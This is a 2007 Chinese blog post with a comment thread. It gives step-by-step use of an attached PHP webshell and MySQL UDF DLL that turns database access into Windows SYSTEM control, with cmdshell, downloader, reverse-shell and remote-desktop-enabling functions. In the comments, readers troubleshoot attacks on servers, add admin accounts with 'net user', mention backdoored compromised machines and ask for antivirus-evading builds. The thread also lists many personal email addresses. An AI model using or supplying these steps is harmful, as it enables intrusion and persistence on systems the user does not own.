将MYSQL读写权限转化为system权限

2007-2-4 19:1:35

       先前我发布了一个用于MYSQL提权的UDF,不过好像不少朋友不是很明白它的使用,不断有人问我它的使用方法,有人干脆叫我写个此UDF的专用PHP。说实话在我写这个PHP之前就只学过点ASP,对PHP那是一窍不通,所以程序中不妥之处在所难免,高手不要见笑。PHP写的比较笨,这里就不讲它怎么写的了,直接讲它的使用。
一、功能:利用MYSQL的自定义函数功能(再次声明:利用MYSQL UDF提权绝非是溢出,而是MYSQL本身的一个功能),将MYSQL账号转化为系统system权限。
二、适用场合:1.目标系统是Windows(Win2000,XP,Win2003);2.你已经拥有MYSQL的某个用户账号,此账号必须有对mysql的insert和delete权限以创建和抛弃函数(MYSQL文档原语)。
三、使用帮助:
  第一步:将PHP文件上传到目标机上,填入你的MYSQL账号经行连接。
 

    第二步:连接成功后,导出DLL文件,导出时请勿必注意导出路径(一般情况下对任何目录可写,无需考虑权限问题),对于MYSQL5.0以上版本,你必须将DLL导出到目标机器的系统目录(win 或 system32),否则在下一步操作中你会看到"No paths allowed for shared library"错误。

  第三步:使用SQL语句创建功能函数。语法:Create Function 函数名(函数名只能为下面列表中的其中之一) returns string soname '导出的DLL路径';对于MYSQL5.0以上版本,语句中的DLL不允许带全路径,如果你在第二步中已将DLL导出到系统目录,那么你就可以省略路径而使命令正常执行,否则你将会看到"Can't open shared library"错误,这时你必须将DLL重新导出到系统目录。

  第四步:正确创建功能函数后,你就可以用SQL语句来使用这些功能了。语法:select 创建的函数名('参数列表'); 每个函数有不同的参数,你可以使用select 创建的函数名('help');来获得指定函数的参数列表信息。

四、功能函数说明:
cmdshell 执行cmd;
  downloader 下载者,到网上下载指定文件并保存到指定目录;
  open3389 通用开3389终端服务,可指定端口(不改端口无需重启);
  backshell 反弹Shell;
  ProcessView 枚举系统进程;
  KillProcess 终止指定进程;
  regread 读注册表;
  regwrite 写注册表;
  shut 关机,注销,重启;
  about 说明与帮助函数;

 

附件:

langousterudf.rar

 

 

 

 

Tags: 编程  脚本注入  后门、远程控制  数据库  
发布:langouster 分类:脚本技术 评论:58 引用:0 浏览:
  • quote 1.test
  • 在使用这个网马时发现这个提示:cmdshell('net user')
    Shell无法启动,GetLastError=Shell无法启动
    请问这个怎么克服?
  • 2007-05-01 11:32:05 回复该留言
  • quote 3.test
  • 怎么启用shell呢?
    langouster 于 2007-05-01 19:19:32 回复
    我也不清楚,看具体情况吧.
  • 2007-05-01 19:19:32 回复该留言
  • quote 4.jan
  • 由于导出了一次,执行了
    drop function cmdshell; 删除函数
    再想利用时就出现下面错误
    执行:
    create function cmdshell returns string soname 'udf.dll'
    出现:
    数据库查讯出错,请检查SQL语句create function cmdshell returns string soname 'udf.dll'的语法是否正确。Function 'cmdshell' already exists

    执行:
    select cmdshell('net user ');
    出现:
    数据库查讯出错,请检查SQL语句select cmdshell('net user '); 的语法是否正确。FUNCTION mysql.cmdshell does not exist

    其它功能可以用,就是这个不可以...
    请问有什么办法可以解决???
    能不能把cmdshell 改成别的名字..
    我想这样应该没问题.
    langouster 于 2007-06-06 11:58:45 回复
    在有些版本的MYSQL上确实会发生这事.这是一个MYSQL的BUG,官方描述如下:

    http://bugs.mysql.com/bug.php?id=15439

    Description:
    Under some circumstances, case handling of UDF names leads to strange behaviour.
    This can result in a situation where the function can be successfully dropped
    without actually removing the corresponding entry from the mysql.func table.

    …………
    --------------------------------
    解决这个问题你可以输入手工输入
    delete from mysql.func where name='cmdshell'
  • 2007-06-06 11:58:45 回复该留言
  • quote 5.jan
  • 感谢你的回复..
    但按照上述做法,还不能解决问题.
    试过很多次了.

    能否把cmdshell 名改一下,再编译后发给我邮箱呀??

    不知为什么,我在这编译总出现错误..

    谢谢...
    langouster 于 2007-06-06 21:11:54 回复
    你的邮箱地址是?
  • 2007-06-06 21:11:55 回复该留言
  • quote 6.jan
  • 在留意时要填写邮箱.所以以为你看到.
    哈哈.
    邮箱地址是wjlring@21cn.com

    谢谢了..
    langouster 于 2007-06-07 21:13:19 回复
    可能是z-blog的一个BUG吧 后台前台都看不到
    langouster 于 2007-06-07 22:22:21 回复
    已发
  • 2007-06-07 22:22:21 回复该留言
  • quote 8.test
  • cmdshell('net user')
    Shell无法启动,GetLastError=Shell无法启动
    再次遇到这个问题,其他所有功能都正常,是不是cmdshell函数该下就可以了?

    另外能把你修改过cmdshell函数名的那个丢我份么?
    谢谢先了
    ann_na_love@163.cm
    yy 于 2007-09-25 11:43:06 回复
    我要要一份chinaim@gmail.com
    langouster 于 2007-09-25 12:14:36 回复
    两个邮箱地址已发送
    perky 于 2008-06-14 07:01:38 回复
    修改过函数的也发我一份 谢谢
    perky 于 2008-06-14 07:02:52 回复
    邮箱地址 perkylin@hotmail.com
  • 2007-09-25 12:14:36 回复该留言
  • quote 9.哇.
  • 麻烦给我也发份吧..>> .> 这个问题 我已经2天2夜没睡了..>

    mrniu#35.com #替换为@
  • 2007-09-30 06:09:06 回复该留言
  • quote 12.还是有问题啊

  • 我到处udf.dll文件时候,就卡那个地方了,空白什么不显示,换个路径也是如此~望老大指导下小弟,3Q~~
    lose 于 2007-12-09 17:42:07 回复
    麻烦发我份UDF.DLL免杀的我,邮箱 dirbest@163.com
  • 2007-12-09 17:42:07 回复该留言
  • quote 13.lose
  • 数据库查讯出错,请检查SQL语句Create Function cmdshell returns string soname 'udf.dll';的语法是否正确。Can't open shared library 'udf.dll' (errno: 2 )
    这个问题怎么解决?麻烦管理员帮下
    langouster2 于 2007-11-29 14:04:41 回复
    你先把DLL导出到系统目录.
    lose 于 2008-09-14 23:47:10 回复
    用了`还是不行,能麻烦大哥发下改过 变量名的份发下我邮箱可以不,

    现在的这份给MACFEE给KILL掉了``
    lose 于 2008-09-14 23:47:12 回复
    用了`还是不行,能麻烦大哥发下改过 变量名的份发下我邮箱可以不,

    现在的这份给MACFEE给KILL掉了``
    lose 于 2008-09-14 23:47:14 回复
    用了`还是不行,能麻烦大哥发下改过 变量名的份发下我邮箱可以不,

    现在的这份给MACFEE给KILL掉了``
  • 2007-11-29 14:04:41 回复该留言
  • quote 14.fyhac
  • 能否把cmdshell 名改一下,再编译后发给我邮箱呀??

    不知为什么,我在这编译总出现错误..
    -----------
    麻烦也发我一份` 我也是这情况
    hacked@msn.cn
  • 2007-12-07 09:59:56 回复该留言
  • quote 16.guoc0079527
  • 我也遇到类似情况很多次了。。
    langouster,麻烦把改名后的发一份给我,邮箱:guoc0079527@yahoo.com.cn 谢谢
  • 2008-01-15 01:59:50 回复该留言
  • quote 17.abc11
  • 我用的时候出现“Fatal error: Call to undefined function shellini() in udf.php on line 89”不知道大哥知道咋回事不??我尝试先下载了个udf.dll到系统目录,可还是不行!!
    langouster 于 2008-02-03 19:29:37 回复
    本DLL没有shellini这个函数,请正文的最后部分。
  • 2008-02-03 19:19:25 回复该留言
  • quote 18.qiur3n
  • langouster如果有空的话麻烦给我也发份修改了cmdshell函数名的文件。在mysql提权中遇到了各种异常无法解释...qiur3n[at]hotmail.com
  • 2008-02-18 13:50:09 回复该留言
  • quote 19.cmdshelluser
  • 我也遇到cmdshell的问题了。麻烦你也发到我信箱里一份。
    这个mix.dll如何编译呢。早期用的那个udf不免杀了。所以不好用了。
    check98@163.com,麻烦你发一份谢谢。
  • 2008-02-24 12:52:45 回复该留言
  • quote 20.cmdshell
  • 我也遇到cmdshell问题了,麻烦也发份给我.谢谢
    7292031#qq.com
    GetLastError=Shell无法启动
  • 2008-03-09 23:17:38 回复该留言
  • quote 21.aspnet
  • 出DLL文件出错:Access denied for user 'aspnet'@'%' (using password: YES)

    这个怎么解决呢?
    langouster2 于 2008-03-13 13:42:46 回复
    管理员修改MYSQL的启动用户了 估计不好搞了
  • 2008-03-13 02:02:21 回复该留言
  • quote 22.vocoo
  • 数据库查讯出错,请检查SQL语句select cmdshell('net user admin admin /add'); 的语法是否正确。FUNCTION mysql.cmdshell does not exist

    cmdshell的问题了。麻烦你也发到我信箱里一份。谢谢.
    webmsnshell#msn.com
  • 2008-03-17 10:29:07 回复该留言
  • quote 23.wuxin
  • 麻烦你也给我发一份好吗。。cmdshell困扰了很久
  • 2008-03-17 13:04:17 回复该留言
  • quote 24.yxrgsky
  • 数据库查讯出错,请检查SQL语句Create Function cmdshell returns string soname 'udf.dll'的语法是否正确。Out of memory; check if mysqld or some other process uses all available memory; if not, you may have to use 'ulimit' to allow mysqld to use more memory or you can add more swap space

    经常出现这样的情况,尝试着用上面的解决方法运行"delete from mysql.func where name='cmdshell',能够看到"命令完成"这几个字,再接着执行和是没作用,这是什么原因呢?CMDSHELL的问题?麻烦也放份给我,谢谢
    yxrgsky@gmail.com
  • 2008-03-22 01:10:05 回复该留言
  • quote 25.9497916
  • 数据库查讯出错,请检查SQL语句create function cmdshell returns string soname 'udf.dll';的语法是否正确。Function 'cmdshell' already exist

    和4楼一样的问题,能发一份给我吗,非常感谢
    9497916@qq.cm
  • 2008-03-22 22:26:48 回复该留言
  • quote 26.111
  • 能给我也发一分最新的UDF吗?以前的不好用了
  • 2008-03-23 02:01:47 回复该留言
  • quote 31.谢谢
  • langouster,麻烦把改名后的发一份给我,邮箱: dirbest@163.com 谢谢了
  • 2008-04-18 14:24:45 回复该留言
  • quote 32.greyair
  • 麻烦把改名后的发一份给我,邮箱: xzj5360@163.com 谢谢了
  • 2008-04-22 05:29:44 回复该留言
  • quote 35.skynet
  • 用langouster_udf.dll的php提权程序 执行
    create function cmdshell returns string soname 'udf.dll';

    就出现下面的这个错误,估计mysql是死掉了,没办法连接了,最近遇到很多站都是这样,由于对这个不了解,所以来请教一下大虾们

    数据库查讯出错,请检查SQL语句create function cmdshell returns string soname 'udf.dll';的语法是否正确。Lost connection to MySQL server during query

    E-mail:272627050#163.com
  • 2008-05-06 16:46:37 回复该留言
  • quote 37.ddd
  • 输入create function cmdshell returns string soname 'udf.dll';后出现下面问题,是什么原因呢?

    数据库查讯出错,请检查SQL语句create function cmdshell returns string soname 'udf.dll';的语法是否正确。Can't open shared library 'udf.dll' (errno: 0 )

    asdxxx@163.com
  • 2008-05-12 06:15:02 回复该留言
  • quote 38.妳吥在
  • 这么多人都遇到一个问题。。。到大为什么不把答案直接写出来呢?
    麻烦给我也来一分吧。。 EMAIL-mayiz@126.com
  • 2008-05-12 20:32:04 回复该留言
  • quote 39.妳吥在
  • 大家知道我遇到的什么问题吗? 晕死 我在肉机内装了后门程序。。前几天还好好的。 今天就突然就添加用户的命令执行了也没用 后来到 su.php里面去执行教程里的命令 结果只会显示命令成功执行 但是用户还是没加进去。。 大家谁能给个解释 这是怎么回事啊。。 帮帮忙哦。。
  • 2008-05-12 21:10:52 回复该留言
  • quote 40.hackycz
  • 老大我也需要个 udf.dll 文件 麻烦传我个 行不?
    hackycz 于 2008-05-17 01:11:27 回复
    我的 邮箱是 hackycz@qq.com
  • 2008-05-17 01:10:59 回复该留言
  • quote 41.Shell无法启动
  • 我也出现过Shell无法启动,GetLastError=Shell无法启动,GetLastError=Shel

    现像,发我一份吧。ugfl3389@163.com
  • 2008-05-23 01:01:32 回复该留言
  • quote 42.wudivip
  • 我的也跟楼上的一样,Shell无法启动,GetLastError=Shell无法启动
    能不能发我一份呢?谢谢咯
  • 2008-06-16 23:58:07 回复该留言
  • quote 43.swat
  • 我的也是Shell无法启动,GetLastError=Shell无法启动,GetLastError=
    麻烦也发一份吧
    邮箱:zzhcool@126.com
  • 2008-06-18 10:25:11 回复该留言
  • quote 44.中国大神
  • root提权问题,我真把他盘全部格式会,浪费我一晚上研究,就是研究不出来什么原因root帐号提权不了,
    C:\Windows\udf.dll 这是成功的随便换目录全部是成功的

    create function cmdshell returns string soname 'udf.dll'这一步就要死人了,换目录也不成功数据库查讯出错,请检查SQL语句create function cmdshell returns string soname 'udf.dll'的语法是否正确。Can't open shared library 'udf.dll' (errno: 2 ) 显示这个,下面的全部显示这个数据库查讯出错,请检查SQL语句select cmdshell('net user user password /add'); 的语法是否正确。FUNCTION mysql.cmdshell does not exist



    版本没问题,为什么会出现这样的情况的,root最高权限出现这样的情况不应该啊,大家帮助一下,很多人也出现这样的情况吧,大虾帮助解决问题,详细一点
  • 2008-06-27 01:06:43 回复该留言
  • quote 45.hello
  • 你好,我也希望能得到一份免杀版本.encode后出现
    Parse error: syntax error, unexpected T_STRING in w:\php.php(2) : eval()'d code on line 2

    cracker_enfr@yahoo.fr
    thanks
  • 2008-07-05 02:26:54 回复该留言
  • quote 46.hi
  • 你好,我也想要一份免杀版本和UDF.DLL
    我ENCODE后出现Parse error: syntax error, unexpected T_STRING in W:\udf11.php(2) : eval()'d code on line 2

    谢谢..
    cracker_enfr@yahoo.fr
  • 2008-07-05 02:28:29 回复该留言
  • quote 47.lafkkk
  • 你好:
    首先非常感谢,你给大家提供这个好东西,但是我想问一个问题,为什么总是导不出dll文件到任意目录,我的环境是mysql5.0+2003+php5.24+iis6.0我这边运行您的网马,无法释放dll文件(任何目录),放到未安装杀毒软件的服务器上也不行,真的不太明白,您的释放原理是不是sql语句+mysql的文件导出,还请大哥指点!谢谢!
    邮箱:anquanl@126.com
  • 2008-07-05 21:16:40 回复该留言
  • quote 48.dssad
  • 您好!
    我为什么在执行create function cmdshell returns string soname 'udf.dll'这个的时候出现数据库查讯出错,请检查SQL语句create function cmdshell returns string soname 'udf.dll'的语法是否正确。Can't open shared library 'udf.dll' (errno: 2 )
    是不是udf.dll问题?如果是的话还请大哥发份到我的邮箱!万分感谢!
    renxuefeng2004@vip.qq.com
  • 2008-07-17 21:52:56 回复该留言
  • quote 49.wsw132
  • 我在执行create function cmdshell returns string soname 'udf.dll'这个的时候出现数据库查讯出错,请检查SQL语句create function cmdshell returns string soname 'udf.dll'的语法是否正确。Can't open shared library 'udf.dll' (errno: 2 )
    和上面的都一样啊大哥能也发一个给我吗,确实辛苦你了这么多人要发,如果您有时间发个给我谢谢53979916@qq.com
  • 2008-07-19 00:36:45 回复该留言
  • quote 51.hackandy
  • DLL导出在C:\Windows\udf.dll成功的,是存在的没被杀。
    当我输入
    create function cmdshell returns string soname 'udf.dll'
    出现:数据库查讯出错,请检查SQL语句create function cmdshell returns string soname 'udf.dll'的语法是否正确。Can't open shared library 'udf.dll' (errno: 2 )
    这样的意思。请老大给我解决 一下。谢谢了。
    也用了
    drop function cmdshell;
    delete from mysql.func where name='cmdshell'
    create function cmdshell returns string soname 'udf.dll'
    还是不行的。

    select version() 看一下mysql的版本是:5.0.51a-community-nt

    请老大帮我解决一下。谢谢 邮箱:xukelinboy#163.com
  • 2008-07-22 03:44:50 回复该留言
  • quote 52.hackandy
  • DLL导出在C:\Windows\udf.dll成功的,是存在的没被杀。
    当我输入
    create function cmdshell returns string soname 'udf.dll'
    出现:数据库查讯出错,请检查SQL语句create function cmdshell returns string soname 'udf.dll'的语法是否正确。Can't open shared library 'udf.dll' (errno: 2 )
    这样的意思。请老大给我解决 一下。谢谢了。
    也用了
    drop function cmdshell;
    delete from mysql.func where name='cmdshell'
    create function cmdshell returns string soname 'udf.dll'
    还是不行的。

    select version() 看一下mysql的版本是:5.0.51a-community-nt

    请老大帮我解决一下。谢谢 邮箱:xukelinboy#163.com
  • 2008-07-22 03:44:55 回复该留言
  • quote 53.wsw132
  • udf.dll导入后被杀啊,老大发给免杀的给我把 53979916@qq.com或wsw132@126.com 您好人有好报
  • 2008-07-23 03:30:59 回复该留言
  • quote 54.wsw132
  • 老大我都等了好多天了,我知道您忙希望您有时间能发个免杀的udf.dll给我
    先谢了53979916@qq.com或wsw132@126.com
    langouster 于 2008-07-23 19:10:52 回复
    在http://www.langouster.com/HTML/7.html的附件中有dll的源程序下载,改改应该能免杀了,我已经很久很久不做udf了,不太改得了。最近也实在太忙,都没时间上blog,不好意思。
  • 2008-07-23 03:40:46 回复该留言
  • quote 55.蜗牛
  • 导出的UDF.DLL被杀了 ,怎么办啊老大。有免杀的麻烦发一份,谢谢

    275490393@qq.com
  • 2008-09-05 15:46:59 回复该留言
  • quote 56.不爱你了
  • 大哥能也发一个给我 可以吗 我也是这样问题 数据库查讯出错,请检查SQL语句select cmdshell('net user ');的语法是否正确。FUNCTION gygov.cmdshell does not exist

    这个问题我搞了很久了 谢谢你了
  • 2008-09-30 13:21:48 回复该留言
  • quote 57.影子
  • 我也是上述那些问题
    把cmdshell 名改一下,再编译后也发我一份吧 谢谢!
  • 2008-11-08 22:54:59 回复该留言

发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

日历

最新评论及回复

最近发表

Copyright langouster. Some Rights Reserved.   苏ICP备06046736号   

本站点由 Z-Blog 2.0 bate Build 构建,基于 Glued Ideas Subtle 主题,由 zx.asd 移植并创新.